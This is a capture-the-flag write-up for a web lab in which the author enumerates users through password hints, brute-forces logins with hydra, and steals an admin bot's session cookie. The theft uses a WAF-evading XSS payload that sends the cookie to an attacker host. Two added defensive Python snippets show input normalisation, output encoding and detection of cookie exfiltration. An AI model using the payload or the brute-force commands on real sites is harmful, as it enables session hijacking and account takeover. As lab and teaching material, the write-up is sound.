
Description:
The farewell server will be decommissioned in less than 24 hours. Everyone is asked to leave one last message, but the admin panel holds all submissions. Can you sneak into the admin area and read every farewell message before the lights go out?
Note: In case you want to start over or restart all services, visit http://<target>/status.php.
Answer the questions below
- What is the flag value after logging in as a normal user?
- What is the flag value after logging in as admin?
This room asks us to log in as a normal user and admin, so my first guess is that we can focus solely on the target web application.
Nmap scan:

Nothing fancy here: HTTP on port 80 as expected, and SSH on port 22, which is also commonly open.
Webpage:
Path enumeration with Gobuster
It timed out and blocked my connection after around 1000 requests, so it's either my poor connection to the box or rate limiting on its side… or maybe both. Therefore, I added "-to 30s" to extend the timeout (default 10 seconds).
gobuster dir -u http://<target ip>/ -w /usr/share/wordlists/dirb/common.txt -to 30s
- /index.php — default login page
- /admin.php — admin page
- /info.php — full phpinfo() output

The admin page requires only a password. I tried to capture the request with Burp Suite and it sends a POST request to itself.
The site has a simple login page for normal users to leave a farewell message.


What's special about this login form is that it tells you whether the user exists and also gives a password hint. The hint can be captured with Burp Suite.


Apart from the admin user, there's a running banner on top of the default login page that shows a few active users.
adam posted a message - 3 hrs ago
deliver11 posted a message - 4 hrs ago
nora posted a message - 1 day ago
With that, I manually captured the hint for each user:
- admin: "password_hint":"the year plus a kind send-off", "last_password_change":"2025-10-31 19:03:00"
- adam: "password_hint":"favorite pet + 2", "last_password_change":"2025-10-21 09:12:00"
- deliver11: "password_hint":"Capital of Japan followed by 4 digits", "last_password_change":"2025-09-10 11:00:00"
- nora: "password_hint":"lucky number 789", "last_password_change":"2025-08-01 13:45:00"
Adam's and Nora's passwords can be anything with these broad hints. That leaves me with admin and deliver11.
Brute-forcing deliver11's password may seem easy, but it's also annoying with the WAF's rate limiting. We may need to add a long delay or rotate IP addresses. For this reason, I aimed for the admin user.
Here are some scripts that might come in handy if you want to try different approaches:
# We can't be too aggressive, but a small wordlist is fine.
hydra -l <user> -P <password_list> <target_ip> http-post-form "/auth.php:username=^USER^&password=^PASS^:F=auth_failed"
# If you want to try deliver11: generate Tokyo0000 through Tokyo9999
for i in $(seq -w 0 9999); do
  echo "Tokyo$i"
done > Tokyoxxxx.txt
The admin password hint is "the year plus a kind send-off", and of course the farewell server will be decommissioned in less than 24 hours. The password likely includes "2025" and a send-off word like "farewell", "bye" or "goodbye".
After a few attempts, I got lucky and found the password:
admin:Farewell2025!
Although the account is named admin, this password doesn't work on the /admin.php page. Of course, that would be a big leap, skipping the normal user login entirely. (/admin.php checks the password against itself, while /index.php checks it via /auth.php.)

What is the flag value after logging in as a normal user? | Done

Any text submitted is surrounded with quotation marks when displayed, and these messages are approved after some time. So, I assumed there's a script reviewing the comment as an admin and our goal is to steal its admin cookie.
Things can never be easy, because of the WAF that has been haunting me since path enumeration. Now it blocks based on patterns like "<script>", "document.cookie" and "<img src=x onerror=…>".

Even if we can submit scripts that aren't blocked by the firewall, we have to ensure that the script that passes the filter actually gets executed.
I opened a temporary HTTP server on the attacker machine.
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Then I used payloads from the XSS (Cross Site Scripting) — HackTricks page to find a working script.
First, I tested whether blind XSS works.

This confirms that the server can connect back to the attacker machine. Next, I attempted a few payloads to find what's blocked by the WAF.
For example, "<img src=x onerror=" is blocked, but "<ImG src=x onerror=" works just fine. It's also worth mentioning that we can't get too fancy with our payload because the input length is limited to 100 characters; otherwise it returns "Maximum 100 characters allowed." There might be a way around it, but I didn't bother to find one.
After a few attempts and box resets, I got this working payload:
<ImG src=x onerror=this.src="http://<ip>/?c="+document["co"+"okie"]>
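As an added example (not from the room or this writeup), the Python below reproduces why a case-sensitive substring blocklist misses the payload above, shows that case-folding the input before matching would have caught it, and shows that HTML-encoding the message on output neutralizes it no matter what the filter does. The pattern list, the 100-character limit and the helper names are assumptions modelled on what the page observed.

```python
import html
import re

# Assumed blocklist, modelled on the patterns the WAF was seen to reject.
BLOCKED_PATTERNS = ["<script>", "document.cookie", "<img src=x onerror="]
MAX_LEN = 100  # the form's "Maximum 100 characters allowed." limit

# The writeup's working payload and its plain lowercase form (constructed).
WORKING_PAYLOAD = '<ImG src=x onerror=this.src="http://<ip>/?c="+document["co"+"okie"]>'
BLOCKED_PAYLOAD = '<img src=x onerror=this.src="http://<ip>/?c="+document.cookie>'


def naive_waf_blocks(text: str) -> bool:
    """Case-sensitive substring match: what the observed behaviour implies."""
    return any(p in text for p in BLOCKED_PATTERNS)


def normalized_waf_blocks(text: str) -> bool:
    """Lower-case and collapse whitespace first. Still a blocklist (the
    document["co"+"okie"] trick shows why those never end), so only a stopgap."""
    norm = re.sub(r"\s+", " ", text.lower())
    return any(p in norm for p in BLOCKED_PATTERNS)


def render_message(text: str) -> str:
    """Output-encode on display, as the approval page should: < > & " ' are
    escaped, so the admin bot's browser sees text, not an <ImG> element."""
    return '"' + html.escape(text, quote=True) + '"'


def contains_tag(rendered: str) -> bool:
    """Crude check: does any '<' still start an HTML tag name?"""
    return re.search(r"<[A-Za-z]", rendered) is not None


def accept_message(text: str):
    """Hardened intake: length limit, normalized filter, encoded output.
    Returns the safe HTML fragment, or None when the message is rejected."""
    if len(text) > MAX_LEN or normalized_waf_blocks(text):
        return None
    return render_message(text)


if __name__ == "__main__":
    print("naive filter blocks working payload:", naive_waf_blocks(WORKING_PAYLOAD))
    print("encoded form:", render_message(WORKING_PAYLOAD))
```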
Replace our session ID with the brand new one we just got.

And now we can truly access /admin.php where the final flag awaits.
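From the defender's side, the callback above leaves a distinctive trace: an outbound request from the approval bot's host whose query string carries a session cookie. The Python below is an added example (not part of the room or the writeup) that scans constructed egress-proxy log lines for that pattern; the log format, hostnames and cookie-name list are assumptions. Setting HttpOnly on the session cookie would stop document.cookie from reading it in the first place.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed egress-proxy log lines for the host that runs the approval bot
# (timestamp, method, URL, status). Not taken from the room.
LOG_LINES = [
    "2025-10-31T19:10:01Z GET http://198.51.100.7/?c=PHPSESSID=abcd1234ef 200",
    "2025-10-31T19:10:02Z GET http://farewell.local/admin.php 200",
    "2025-10-31T19:10:03Z GET http://198.51.100.7/x.png?id=PHPSESSID%3Dzz99&v=1 404",
    "2025-10-31T19:10:04Z GET http://cdn.example/logo.png?v=42 200",
]

# Cookie names that have no business appearing inside a query string.
SESSION_COOKIE_NAMES = ("phpsessid", "sessionid", "session", "token")


def leaked_cookie_params(url: str) -> list:
    """Return query parameter names whose URL-decoded value starts with a
    session cookie name followed by '=', e.g. ?c=PHPSESSID=... ."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    prefixes = tuple(f"{n}=" for n in SESSION_COOKIE_NAMES)
    hits = []
    for name, values in query.items():
        # parse_qs already decodes %3D to '=', so encoded variants match too
        if any(v.lower().startswith(prefixes) for v in values):
            hits.append(name)
    return hits


def flag_exfil(lines: list) -> list:
    """Scan log lines; return (timestamp, url, offending_params) per hit."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line: skip rather than crash the scan
        ts, url = parts[0], parts[2]
        params = leaked_cookie_params(url)
        if params:
            findings.append((ts, url, params))
    return findings


if __name__ == "__main__":
    for ts, url, params in flag_exfil(LOG_LINES):
        print(f"{ts} possible session-cookie exfiltration via {params}: {url}")
```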

What is the flag value after logging in as admin? | Done
Enjoy Bidding Farewell! ( — — ;)
